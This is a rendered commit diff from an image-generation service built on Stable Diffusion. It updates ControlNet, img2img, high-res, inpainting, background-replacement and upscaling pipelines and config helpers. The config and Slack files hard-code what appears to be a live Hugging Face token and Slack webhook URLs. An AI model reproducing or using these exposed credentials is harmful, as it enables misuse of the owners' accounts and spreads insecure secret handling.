14
  if has_nsfw and isinstance(has_nsfw, list):
15
  has_nsfw = any(has_nsfw)
16
 
 
10
 
11
  @staticmethod
12
  def from_result(result):
13
+ if hasattr(result, "nsfw_content_detected"):
14
+ has_nsfw = result.nsfw_content_detected
15
+ else:
16
+ has_nsfw = False
17
  if has_nsfw and isinstance(has_nsfw, list):
18
  has_nsfw = any(has_nsfw)
19
 
internals/data/task.py CHANGED
@@ -18,6 +18,7 @@ class TaskType(Enum):
18
  SCRIBBLE = "SCRIBBLE"
19
  LINEARART = "LINEARART"
20
  REPLACE_BG = "REPLACE_BG"
 
21
 
22
 
23
  class ModelType(Enum):
@@ -134,6 +135,9 @@ class Task:
134
  def get_po_guidance_scale(self) -> float:
135
  return self.__data.get("po_guidance_scale", 7.5)
136
 
 
 
 
137
  def get_nsfw_threshold(self) -> float:
138
  return self.__data.get("nsfw_threshold", 0.03)
139
 
@@ -143,6 +147,9 @@ class Task:
143
  def get_access_token(self) -> str:
144
  return self.__data.get("access_token", "")
145
 
 
 
 
146
  def get_raw(self) -> dict:
147
  return self.__data.copy()
148
 
 
18
  SCRIBBLE = "SCRIBBLE"
19
  LINEARART = "LINEARART"
20
  REPLACE_BG = "REPLACE_BG"
21
+ SYSTEM_CMD = "SYSTEM_CMD"
22
 
23
 
24
  class ModelType(Enum):
 
135
  def get_po_guidance_scale(self) -> float:
136
  return self.__data.get("po_guidance_scale", 7.5)
137
 
138
+ def rbg_controlnet_conditioning_scale(self) -> float:
139
+ return self.__data.get("rbg_conditioning_scale", 0.5)
140
+
141
  def get_nsfw_threshold(self) -> float:
142
  return self.__data.get("nsfw_threshold", 0.03)
143
 
 
147
  def get_access_token(self) -> str:
148
  return self.__data.get("access_token", "")
149
 
150
+ def get_high_res_fix(self) -> bool:
151
+ return self.__data.get("high_res_fix", False)
152
+
153
  def get_raw(self) -> dict:
154
  return self.__data.copy()
155
 
internals/pipelines/commons.py CHANGED
@@ -118,18 +118,27 @@ class Text2Img(AbstractPipeline):
118
 
119
 
120
  class Img2Img(AbstractPipeline):
 
 
121
  def load(self, model_dir: str):
 
 
 
122
  self.pipe = StableDiffusionImg2ImgPipeline.from_pretrained(
123
  model_dir, torch_dtype=torch.float16, use_auth_token=get_hf_token()
124
  ).to("cuda")
125
  self.__patch()
126
 
 
 
127
  def create(self, pipeline: AbstractPipeline):
128
  self.pipe = StableDiffusionImg2ImgPipeline(**pipeline.pipe.components).to(
129
  "cuda"
130
  )
131
  self.__patch()
132
 
 
 
133
  def __patch(self):
134
  self.pipe.enable_xformers_memory_efficient_attention()
135
 
 
118
 
119
 
120
  class Img2Img(AbstractPipeline):
121
+ __loaded = False
122
+
123
  def load(self, model_dir: str):
124
+ if self.__loaded:
125
+ return
126
+
127
  self.pipe = StableDiffusionImg2ImgPipeline.from_pretrained(
128
  model_dir, torch_dtype=torch.float16, use_auth_token=get_hf_token()
129
  ).to("cuda")
130
  self.__patch()
131
 
132
+ self.__loaded = True
133
+
134
  def create(self, pipeline: AbstractPipeline):
135
  self.pipe = StableDiffusionImg2ImgPipeline(**pipeline.pipe.components).to(
136
  "cuda"
137
  )
138
  self.__patch()
139
 
140
+ self.__loaded = True
141
+
142
  def __patch(self):
143
  self.pipe.enable_xformers_memory_efficient_attention()
144
 
internals/pipelines/controlnets.py CHANGED
@@ -4,24 +4,20 @@ import cv2
4
  import numpy as np
5
  import torch
6
  from controlnet_aux import HEDdetector, LineartDetector, OpenposeDetector
7
- from diffusers import (
8
- ControlNetModel,
9
- DiffusionPipeline,
10
- StableDiffusionControlNetPipeline,
11
- UniPCMultistepScheduler,
12
- )
13
  from PIL import Image
14
  from torch.nn import Linear
15
  from tqdm import gui
16
 
17
  from internals.data.result import Result
18
  from internals.pipelines.commons import AbstractPipeline
19
- from internals.pipelines.tileUpscalePipeline import (
20
- StableDiffusionControlNetImg2ImgPipeline,
21
- )
22
  from internals.util.cache import clear_cuda_and_gc
23
  from internals.util.commons import download_image
24
- from internals.util.config import get_hf_token, get_model_dir
25
 
26
 
27
  class ControlNet(AbstractPipeline):
@@ -41,6 +37,7 @@ class ControlNet(AbstractPipeline):
41
  controlnet=self.controlnet,
42
  torch_dtype=torch.float16,
43
  use_auth_token=get_hf_token(),
 
44
  ).to("cuda")
45
  # pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
46
  pipe.enable_model_cpu_offload()
@@ -59,7 +56,9 @@ class ControlNet(AbstractPipeline):
59
  if self.__current_task_name == "canny":
60
  return
61
  canny = ControlNetModel.from_pretrained(
62
- "lllyasviel/control_v11p_sd15_canny", torch_dtype=torch.float16
 
 
63
  ).to("cuda")
64
  self.__current_task_name = "canny"
65
  self.controlnet = canny
@@ -76,7 +75,9 @@ class ControlNet(AbstractPipeline):
76
  if self.__current_task_name == "pose":
77
  return
78
  pose = ControlNetModel.from_pretrained(
79
- "lllyasviel/sd-controlnet-openpose", torch_dtype=torch.float16
 
 
80
  ).to("cuda")
81
  self.__current_task_name = "pose"
82
  self.controlnet = pose
@@ -93,7 +94,9 @@ class ControlNet(AbstractPipeline):
93
  if self.__current_task_name == "tile_upscaler":
94
  return
95
  tile_upscaler = ControlNetModel.from_pretrained(
96
- "lllyasviel/control_v11f1e_sd15_tile", torch_dtype=torch.float16
 
 
97
  ).to("cuda")
98
  self.__current_task_name = "tile_upscaler"
99
  self.controlnet = tile_upscaler
@@ -110,7 +113,9 @@ class ControlNet(AbstractPipeline):
110
  if self.__current_task_name == "scribble":
111
  return
112
  scribble = ControlNetModel.from_pretrained(
113
- "lllyasviel/control_v11p_sd15_scribble", torch_dtype=torch.float16
 
 
114
  ).to("cuda")
115
  self.__current_task_name = "scribble"
116
  self.controlnet = scribble
@@ -129,6 +134,7 @@ class ControlNet(AbstractPipeline):
129
  linearart = ControlNetModel.from_pretrained(
130
  "ControlNet-1-1-preview/control_v11p_sd15_lineart",
131
  torch_dtype=torch.float16,
 
132
  ).to("cuda")
133
  self.__current_task_name = "linearart"
134
  self.controlnet = linearart
@@ -142,9 +148,12 @@ class ControlNet(AbstractPipeline):
142
  clear_cuda_and_gc()
143
 
144
  def cleanup(self):
145
- self.pipe.controlnet = None
146
- self.pipe2.controlnet = None
 
 
147
  self.controlnet = None
 
148
  self.__current_task_name = ""
149
 
150
  clear_cuda_and_gc()
@@ -343,7 +352,7 @@ class ControlNet(AbstractPipeline):
343
  def __resize_for_condition_image(self, image: Image.Image, resolution: int):
344
  input_image = image.convert("RGB")
345
  W, H = input_image.size
346
- k = float(resolution) / min(W, H)
347
  H *= k
348
  W *= k
349
  H = int(round(H / 64.0)) * 64
 
4
  import numpy as np
5
  import torch
6
  from controlnet_aux import HEDdetector, LineartDetector, OpenposeDetector
7
+ from diffusers import (ControlNetModel, DiffusionPipeline,
8
+ StableDiffusionControlNetPipeline,
9
+ UniPCMultistepScheduler)
 
 
 
10
  from PIL import Image
11
  from torch.nn import Linear
12
  from tqdm import gui
13
 
14
  from internals.data.result import Result
15
  from internals.pipelines.commons import AbstractPipeline
16
+ from internals.pipelines.tileUpscalePipeline import \
17
+ StableDiffusionControlNetImg2ImgPipeline
 
18
  from internals.util.cache import clear_cuda_and_gc
19
  from internals.util.commons import download_image
20
+ from internals.util.config import get_hf_cache_dir, get_hf_token, get_model_dir
21
 
22
 
23
  class ControlNet(AbstractPipeline):
 
37
  controlnet=self.controlnet,
38
  torch_dtype=torch.float16,
39
  use_auth_token=get_hf_token(),
40
+ cache_dir=get_hf_cache_dir(),
41
  ).to("cuda")
42
  # pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
43
  pipe.enable_model_cpu_offload()
 
56
  if self.__current_task_name == "canny":
57
  return
58
  canny = ControlNetModel.from_pretrained(
59
+ "lllyasviel/control_v11p_sd15_canny",
60
+ torch_dtype=torch.float16,
61
+ cache_dir=get_hf_cache_dir(),
62
  ).to("cuda")
63
  self.__current_task_name = "canny"
64
  self.controlnet = canny
 
75
  if self.__current_task_name == "pose":
76
  return
77
  pose = ControlNetModel.from_pretrained(
78
+ "lllyasviel/sd-controlnet-openpose",
79
+ torch_dtype=torch.float16,
80
+ cache_dir=get_hf_cache_dir(),
81
  ).to("cuda")
82
  self.__current_task_name = "pose"
83
  self.controlnet = pose
 
94
  if self.__current_task_name == "tile_upscaler":
95
  return
96
  tile_upscaler = ControlNetModel.from_pretrained(
97
+ "lllyasviel/control_v11f1e_sd15_tile",
98
+ torch_dtype=torch.float16,
99
+ cache_dir=get_hf_cache_dir(),
100
  ).to("cuda")
101
  self.__current_task_name = "tile_upscaler"
102
  self.controlnet = tile_upscaler
 
113
  if self.__current_task_name == "scribble":
114
  return
115
  scribble = ControlNetModel.from_pretrained(
116
+ "lllyasviel/control_v11p_sd15_scribble",
117
+ torch_dtype=torch.float16,
118
+ cache_dir=get_hf_cache_dir(),
119
  ).to("cuda")
120
  self.__current_task_name = "scribble"
121
  self.controlnet = scribble
 
134
  linearart = ControlNetModel.from_pretrained(
135
  "ControlNet-1-1-preview/control_v11p_sd15_lineart",
136
  torch_dtype=torch.float16,
137
+ cache_dir=get_hf_cache_dir(),
138
  ).to("cuda")
139
  self.__current_task_name = "linearart"
140
  self.controlnet = linearart
 
148
  clear_cuda_and_gc()
149
 
150
  def cleanup(self):
151
+ if hasattr(self, "pipe"):
152
+ self.pipe.controlnet = None
153
+ if hasattr(self, "pipe2"):
154
+ self.pipe2.controlnet = None
155
  self.controlnet = None
156
+ del self.controlnet
157
  self.__current_task_name = ""
158
 
159
  clear_cuda_and_gc()
 
352
  def __resize_for_condition_image(self, image: Image.Image, resolution: int):
353
  input_image = image.convert("RGB")
354
  W, H = input_image.size
355
+ k = float(resolution) / max(W, H)
356
  H *= k
357
  W *= k
358
  H = int(round(H / 64.0)) * 64
internals/pipelines/high_res.py ADDED
@@ -0,0 +1,55 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import math
2
+ from typing import List, Optional
3
+
4
+ from PIL import Image
5
+
6
+ from internals.data.result import Result
7
+ from internals.pipelines.commons import AbstractPipeline, Img2Img
8
+ from internals.util.config import get_model_dir
9
+
10
+
11
+ class HighRes(AbstractPipeline):
12
+ def load(self, img2img: Optional[Img2Img] = None):
13
+ if hasattr(self, "pipe"):
14
+ return
15
+
16
+ if not img2img:
17
+ img2img = Img2Img()
18
+ img2img.load(get_model_dir())
19
+
20
+ self.pipe = img2img.pipe
21
+ self.img2img = img2img
22
+
23
+ def apply(
24
+ self,
25
+ prompt: List[str],
26
+ negative_prompt: List[str],
27
+ images,
28
+ width: int,
29
+ height: int,
30
+ steps: int,
31
+ ):
32
+ images = [image.resize((width, height)) for image in images]
33
+ result = self.pipe.__call__(
34
+ prompt=prompt,
35
+ image=images,
36
+ strength=0.5,
37
+ negative_prompt=negative_prompt,
38
+ guidance_scale=9,
39
+ num_inference_steps=steps,
40
+ )
41
+ return Result.from_result(result)
42
+
43
+ @staticmethod
44
+ def get_intermediate_dimension(target_width: int, target_height: int):
45
+ def_size = 512
46
+
47
+ desired_pixel_count = def_size * def_size
48
+ actual_pixel_count = target_width * target_height
49
+
50
+ scale = math.sqrt(desired_pixel_count / actual_pixel_count)
51
+
52
+ firstpass_width = math.ceil(scale * target_width / 64) * 64
53
+ firstpass_height = math.ceil(scale * target_height / 64) * 64
54
+
55
+ return firstpass_width, firstpass_height
internals/pipelines/img_to_text.py CHANGED
@@ -5,6 +5,7 @@ from torchvision import transforms
5
  from transformers import BlipForConditionalGeneration, BlipProcessor
6
 
7
  from internals.util.commons import download_image
 
8
 
9
 
10
  class Image2Text:
@@ -15,10 +16,13 @@ class Image2Text:
15
  return
16
 
17
  self.processor = BlipProcessor.from_pretrained(
18
- "Salesforce/blip-image-captioning-large"
 
19
  )
20
  self.model = BlipForConditionalGeneration.from_pretrained(
21
- "Salesforce/blip-image-captioning-large", torch_dtype=torch.float16
 
 
22
  ).to("cuda")
23
 
24
  self.__loaded = True
 
5
  from transformers import BlipForConditionalGeneration, BlipProcessor
6
 
7
  from internals.util.commons import download_image
8
+ from internals.util.config import get_hf_cache_dir
9
 
10
 
11
  class Image2Text:
 
16
  return
17
 
18
  self.processor = BlipProcessor.from_pretrained(
19
+ "Salesforce/blip-image-captioning-large",
20
+ cache_dir=get_hf_cache_dir(),
21
  )
22
  self.model = BlipForConditionalGeneration.from_pretrained(
23
+ "Salesforce/blip-image-captioning-large",
24
+ torch_dtype=torch.float16,
25
+ cache_dir=get_hf_cache_dir(),
26
  ).to("cuda")
27
 
28
  self.__loaded = True
internals/pipelines/inpainter.py CHANGED
@@ -5,6 +5,7 @@ from diffusers import StableDiffusionInpaintPipeline
5
 
6
  from internals.pipelines.commons import AbstractPipeline
7
  from internals.util.commons import disable_safety_checker, download_image
 
8
 
9
 
10
  class InPainter(AbstractPipeline):
@@ -12,6 +13,7 @@ class InPainter(AbstractPipeline):
12
  self.pipe = StableDiffusionInpaintPipeline.from_pretrained(
13
  "jayparmr/icbinp_v8_inpaint_v2",
14
  torch_dtype=torch.float16,
 
15
  ).to("cuda")
16
  disable_safety_checker(self.pipe)
17
 
@@ -31,6 +33,7 @@ class InPainter(AbstractPipeline):
31
  seed: int,
32
  prompt: Union[str, List[str]],
33
  negative_prompt: Union[str, List[str]],
 
34
  ):
35
  torch.manual_seed(seed)
36
 
@@ -44,4 +47,5 @@ class InPainter(AbstractPipeline):
44
  height=height,
45
  width=width,
46
  negative_prompt=negative_prompt,
 
47
  ).images
 
5
 
6
  from internals.pipelines.commons import AbstractPipeline
7
  from internals.util.commons import disable_safety_checker, download_image
8
+ from internals.util.config import get_hf_cache_dir
9
 
10
 
11
  class InPainter(AbstractPipeline):
 
13
  self.pipe = StableDiffusionInpaintPipeline.from_pretrained(
14
  "jayparmr/icbinp_v8_inpaint_v2",
15
  torch_dtype=torch.float16,
16
+ cache_dir=get_hf_cache_dir(),
17
  ).to("cuda")
18
  disable_safety_checker(self.pipe)
19
 
 
33
  seed: int,
34
  prompt: Union[str, List[str]],
35
  negative_prompt: Union[str, List[str]],
36
+ steps: int = 50,
37
  ):
38
  torch.manual_seed(seed)
39
 
 
47
  height=height,
48
  width=width,
49
  negative_prompt=negative_prompt,
50
+ num_inference_steps=steps,
51
  ).images
internals/pipelines/replace_background.py CHANGED
@@ -17,17 +17,21 @@ from internals.pipelines.controlnets import ControlNet
17
  from internals.pipelines.remove_background import RemoveBackgroundV2
18
  from internals.pipelines.upscaler import Upscaler
19
  from internals.util.commons import download_image
 
20
 
21
 
22
  class ReplaceBackground(AbstractPipeline):
23
  def load(self, upscaler: Upscaler, remove_background: RemoveBackgroundV2):
24
  controlnet = ControlNetModel.from_pretrained(
25
- "lllyasviel/control_v11p_sd15_lineart", torch_dtype=torch.float16
 
 
26
  ).to("cuda")
27
  pipe = StableDiffusionControlNetInpaintPipeline.from_pretrained(
28
  "runwayml/stable-diffusion-inpainting",
29
  controlnet=controlnet,
30
  torch_dtype=torch.float16,
 
31
  )
32
  pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
33
  pipe.to("cuda")
@@ -47,6 +51,7 @@ class ReplaceBackground(AbstractPipeline):
47
  prompt: Union[str, List[str]],
48
  negative_prompt: Union[str, List[str]],
49
  resize_dimension: int,
 
50
  seed: int,
51
  steps: int,
52
  ):
@@ -57,6 +62,8 @@ class ReplaceBackground(AbstractPipeline):
57
  torch.cuda.manual_seed(seed)
58
 
59
  image = image.convert("RGB")
 
 
60
  image = self.remove_background.remove(image)
61
 
62
  width = int(width)
@@ -95,6 +102,7 @@ class ReplaceBackground(AbstractPipeline):
95
  image=image,
96
  mask_image=mask,
97
  control_image=condition_image,
 
98
  guidance_scale=9,
99
  strength=1,
100
  height=height,
 
17
  from internals.pipelines.remove_background import RemoveBackgroundV2
18
  from internals.pipelines.upscaler import Upscaler
19
  from internals.util.commons import download_image
20
+ from internals.util.config import get_hf_cache_dir
21
 
22
 
23
  class ReplaceBackground(AbstractPipeline):
24
  def load(self, upscaler: Upscaler, remove_background: RemoveBackgroundV2):
25
  controlnet = ControlNetModel.from_pretrained(
26
+ "lllyasviel/control_v11p_sd15_lineart",
27
+ torch_dtype=torch.float16,
28
+ cache_dir=get_hf_cache_dir(),
29
  ).to("cuda")
30
  pipe = StableDiffusionControlNetInpaintPipeline.from_pretrained(
31
  "runwayml/stable-diffusion-inpainting",
32
  controlnet=controlnet,
33
  torch_dtype=torch.float16,
34
+ cache_dir=get_hf_cache_dir(),
35
  )
36
  pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
37
  pipe.to("cuda")
 
51
  prompt: Union[str, List[str]],
52
  negative_prompt: Union[str, List[str]],
53
  resize_dimension: int,
54
+ conditioning_scale: float,
55
  seed: int,
56
  steps: int,
57
  ):
 
62
  torch.cuda.manual_seed(seed)
63
 
64
  image = image.convert("RGB")
65
+ if max(image.size) > 1536:
66
+ image = ImageUtil.resize_image(image, dimension=1536)
67
  image = self.remove_background.remove(image)
68
 
69
  width = int(width)
 
102
  image=image,
103
  mask_image=mask,
104
  control_image=condition_image,
105
+ controlnet_conditioning_scale=conditioning_scale,
106
  guidance_scale=9,
107
  strength=1,
108
  height=height,
internals/pipelines/upscaler.py CHANGED
@@ -15,6 +15,7 @@ from realesrgan import RealESRGANer
15
  import internals.util.image as ImageUtil
16
  from internals.util.commons import download_image
17
  from internals.util.config import get_root_dir
 
18
 
19
 
20
  class Upscaler:
@@ -23,6 +24,9 @@ class Upscaler:
23
  __model_gfpgan_url = (
24
  "https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth"
25
  )
 
 
 
26
 
27
  __loaded = False
28
 
@@ -40,6 +44,9 @@ class Upscaler:
40
  self.__model_path_gfpgan = self.__preload_model(
41
  self.__model_gfpgan_url, download_dir
42
  )
 
 
 
43
  self.__loaded = True
44
 
45
  def upscale(
@@ -129,16 +136,21 @@ class Upscaler:
129
  scale = max(math.floor(resize_dimension / dimension), 2)
130
 
131
  os.chdir(str(Path.home() / ".cache"))
132
- upsampler = RealESRGANer(
133
- scale=4,
134
- model_path=model_path,
135
- model=model,
136
- half=False,
137
- gpu_id="0",
138
- tile=0,
139
- tile_pad=10,
140
- pre_pad=0,
141
- )
 
 
 
 
 
142
  face_enhancer = GFPGANer(
143
  model_path=self.__model_path_gfpgan,
144
  upscale=scale,
 
15
  import internals.util.image as ImageUtil
16
  from internals.util.commons import download_image
17
  from internals.util.config import get_root_dir
18
+ from models.ultrasharp.model import Ultrasharp
19
 
20
 
21
  class Upscaler:
 
24
  __model_gfpgan_url = (
25
  "https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth"
26
  )
27
+ __model_4x_ultrasharp_url = (
28
+ "https://comic-assets.s3.ap-south-1.amazonaws.com/models/4x-UltraSharp.pth"
29
+ )
30
 
31
  __loaded = False
32
 
 
44
  self.__model_path_gfpgan = self.__preload_model(
45
  self.__model_gfpgan_url, download_dir
46
  )
47
+ self.__model_path_4x_ultrasharp = self.__preload_model(
48
+ self.__model_4x_ultrasharp_url, download_dir
49
+ )
50
  self.__loaded = True
51
 
52
  def upscale(
 
136
  scale = max(math.floor(resize_dimension / dimension), 2)
137
 
138
  os.chdir(str(Path.home() / ".cache"))
139
+ if scale == 4:
140
+ print("Using 4x-Ultrasharp")
141
+ upsampler = Ultrasharp(self.__model_path_4x_ultrasharp)
142
+ else:
143
+ print("Using RealESRGANer")
144
+ upsampler = RealESRGANer(
145
+ scale=4,
146
+ model_path=model_path,
147
+ model=model,
148
+ half=False,
149
+ gpu_id="0",
150
+ tile=0,
151
+ tile_pad=10,
152
+ pre_pad=0,
153
+ )
154
  face_enhancer = GFPGANer(
155
  model_path=self.__model_path_gfpgan,
156
  upscale=scale,
internals/util/avatar.py CHANGED
@@ -15,6 +15,8 @@ class Avatar:
15
  print("Local characters", self.__avatars)
16
 
17
  def fetch_from_network(self, model_id: int):
 
 
18
  characters = getCharacters(str(model_id))
19
  if characters is not None:
20
  for character in characters:
 
15
  print("Local characters", self.__avatars)
16
 
17
  def fetch_from_network(self, model_id: int):
18
+ if not model_id:
19
+ return
20
  characters = getCharacters(str(model_id))
21
  if characters is not None:
22
  for character in characters:
internals/util/config.py CHANGED
@@ -1,17 +1,32 @@
1
  import os
 
 
2
 
3
  from internals.data.task import Task
4
 
5
- env = "gamma"
6
  nsfw_threshold = 0.0
7
  nsfw_access = False
8
  access_token = ""
9
  root_dir = ""
10
  model_dir = ""
11
  hf_token = "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"
 
12
 
13
  num_return_sequences = 4 # the number of results to generate
14
 
 
 
 
 
 
 
 
 
 
 
 
 
15
 
16
  def set_model_dir(dir: str):
17
  global model_dir
@@ -26,10 +41,10 @@ def set_root_dir(main_file: str):
26
  def set_configs_from_task(task: Task):
27
  global env, nsfw_threshold, nsfw_access, access_token
28
  name = task.get_queue_name()
29
- if name.startswith("prod"):
30
- env = "prod"
31
- else:
32
  env = "gamma"
 
 
33
  nsfw_threshold = task.get_nsfw_threshold()
34
  nsfw_access = task.can_access_nsfw()
35
  access_token = task.get_access_token()
 
1
  import os
2
+ from pathlib import Path
3
+ from typing import Union
4
 
5
  from internals.data.task import Task
6
 
7
+ env = "prod"
8
  nsfw_threshold = 0.0
9
  nsfw_access = False
10
  access_token = ""
11
  root_dir = ""
12
  model_dir = ""
13
  hf_token = "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"
14
+ hf_cache_dir = "/tmp/hf_hub"
15
 
16
  num_return_sequences = 4 # the number of results to generate
17
 
18
+ os.makedirs(hf_cache_dir, exist_ok=True)
19
+
20
+
21
+ def set_hf_cache_dir(dir: Union[str, Path]):
22
+ global hf_cache_dir
23
+ hf_cache_dir = str(dir)
24
+
25
+
26
+ def get_hf_cache_dir():
27
+ global hf_cache_dir
28
+ return hf_cache_dir
29
+
30
 
31
  def set_model_dir(dir: str):
32
  global model_dir
 
41
  def set_configs_from_task(task: Task):
42
  global env, nsfw_threshold, nsfw_access, access_token
43
  name = task.get_queue_name()
44
+ if name.startswith("gamma"):
 
 
45
  env = "gamma"
46
+ else:
47
+ env = "prod"
48
  nsfw_threshold = task.get_nsfw_threshold()
49
  nsfw_access = task.can_access_nsfw()
50
  access_token = task.get_access_token()
internals/util/prompt.py ADDED
@@ -0,0 +1,132 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from typing import List, Optional
2
+
3
+ from internals.data.task import Task
4
+ from internals.pipelines.commons import Text2Img
5
+ from internals.pipelines.img_classifier import ImageClassifier
6
+ from internals.pipelines.img_to_text import Image2Text
7
+ from internals.pipelines.prompt_modifier import PromptModifier
8
+ from internals.util.anomaly import remove_colors
9
+ from internals.util.avatar import Avatar
10
+ from internals.util.config import num_return_sequences
11
+ from internals.util.lora_style import LoraStyle
12
+
13
+
14
+ def get_patched_prompt(
15
+ task: Task,
16
+ avatar: Avatar,
17
+ lora_style: LoraStyle,
18
+ prompt_modifier: PromptModifier,
19
+ ):
20
+ def add_style_and_character(prompt: List[str], additional: Optional[str] = None):
21
+ for i in range(len(prompt)):
22
+ prompt[i] = avatar.add_code_names(prompt[i])
23
+ prompt[i] = lora_style.prepend_style_to_prompt(prompt[i], task.get_style())
24
+ if additional:
25
+ prompt[i] = additional + " " + prompt[i]
26
+
27
+ prompt = task.get_prompt()
28
+
29
+ if task.is_prompt_engineering():
30
+ prompt = prompt_modifier.modify(prompt)
31
+ else:
32
+ prompt = [prompt] * num_return_sequences
33
+
34
+ ori_prompt = [task.get_prompt()] * num_return_sequences
35
+
36
+ class_name = None
37
+ add_style_and_character(ori_prompt, class_name)
38
+ add_style_and_character(prompt, class_name)
39
+
40
+ print({"prompts": prompt})
41
+
42
+ return (prompt, ori_prompt)
43
+
44
+
45
+ def get_patched_prompt_text2img(
46
+ task: Task,
47
+ avatar: Avatar,
48
+ lora_style: LoraStyle,
49
+ prompt_modifier: PromptModifier,
50
+ ) -> Text2Img.Params:
51
+ def add_style_and_character(prompt: str, prepend: str = ""):
52
+ prompt = avatar.add_code_names(prompt)
53
+ prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
54
+ prompt = prepend + prompt
55
+ return prompt
56
+
57
+ if task.get_prompt_left() and task.get_prompt_right():
58
+ # prepend = "2characters, "
59
+ prepend = ""
60
+ if task.is_prompt_engineering():
61
+ mod_prompt = prompt_modifier.modify(task.get_prompt())
62
+ else:
63
+ mod_prompt = [task.get_prompt()] * num_return_sequences
64
+
65
+ prompt, prompt_left, prompt_right = [], [], []
66
+ for i in range(len(mod_prompt)):
67
+ mp = mod_prompt[i].replace(task.get_prompt(), "")
68
+ prompt.append(add_style_and_character(task.get_prompt(), prepend) + mp)
69
+ prompt_left.append(
70
+ add_style_and_character(task.get_prompt_left(), prepend) + mp
71
+ )
72
+ prompt_right.append(
73
+ add_style_and_character(task.get_prompt_right(), prepend) + mp
74
+ )
75
+
76
+ params = Text2Img.Params(
77
+ prompt=prompt,
78
+ prompt_left=prompt_left,
79
+ prompt_right=prompt_right,
80
+ )
81
+ else:
82
+ if task.is_prompt_engineering():
83
+ mod_prompt = prompt_modifier.modify(task.get_prompt())
84
+ else:
85
+ mod_prompt = [task.get_prompt()] * num_return_sequences
86
+ mod_prompt = [add_style_and_character(mp) for mp in mod_prompt]
87
+
88
+ params = Text2Img.Params(
89
+ prompt=[add_style_and_character(task.get_prompt())] * num_return_sequences,
90
+ modified_prompt=mod_prompt,
91
+ )
92
+
93
+ print(params)
94
+
95
+ return params
96
+
97
+
98
+ def get_patched_prompt_tile_upscale(
99
+ task: Task,
100
+ avatar: Avatar,
101
+ lora_style: LoraStyle,
102
+ img_classifier: ImageClassifier,
103
+ img2text: Image2Text,
104
+ ):
105
+ if task.get_prompt():
106
+ prompt = task.get_prompt()
107
+ else:
108
+ prompt = img2text.process(task.get_imageUrl())
109
+
110
+ # merge blip
111
+ if task.PROMPT.has_placeholder_blip_merge():
112
+ blip = img2text.process(task.get_imageUrl())
113
+ prompt = task.PROMPT.merge_blip(blip)
114
+
115
+ # remove anomalies in prompt
116
+ prompt = remove_colors(prompt)
117
+
118
+ prompt = avatar.add_code_names(prompt)
119
+ prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
120
+
121
+ if not task.get_style():
122
+ class_name = img_classifier.classify(
123
+ task.get_imageUrl(), task.get_width(), task.get_height()
124
+ )
125
+ else:
126
+ class_name = ""
127
+ prompt = class_name + " " + prompt
128
+ prompt = prompt.strip()
129
+
130
+ print({"prompt": prompt})
131
+
132
+ return prompt
internals/util/slack.py CHANGED
@@ -11,7 +11,7 @@ class Slack:
11
  def __init__(self):
12
  # self.webhook_url = "https://hooks.slack.com/services/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"
13
  self.webhook_url = "https://hooks.slack.com/services/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"
14
- self.error_webhook = "https://hooks.slack.com/services/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"
15
 
16
  def send_alert(self, task: Task, args: Optional[dict]):
17
  raw = task.get_raw().copy()
 
11
  def __init__(self):
12
  # self.webhook_url = "https://hooks.slack.com/services/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"
13
  self.webhook_url = "https://hooks.slack.com/services/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"
14
+ self.error_webhook = "https://hooks.slack.com/services/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"
15
 
16
  def send_alert(self, task: Task, args: Optional[dict]):
17
  raw = task.get_raw().copy()
models/ultrasharp/arch.py ADDED
@@ -0,0 +1,756 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
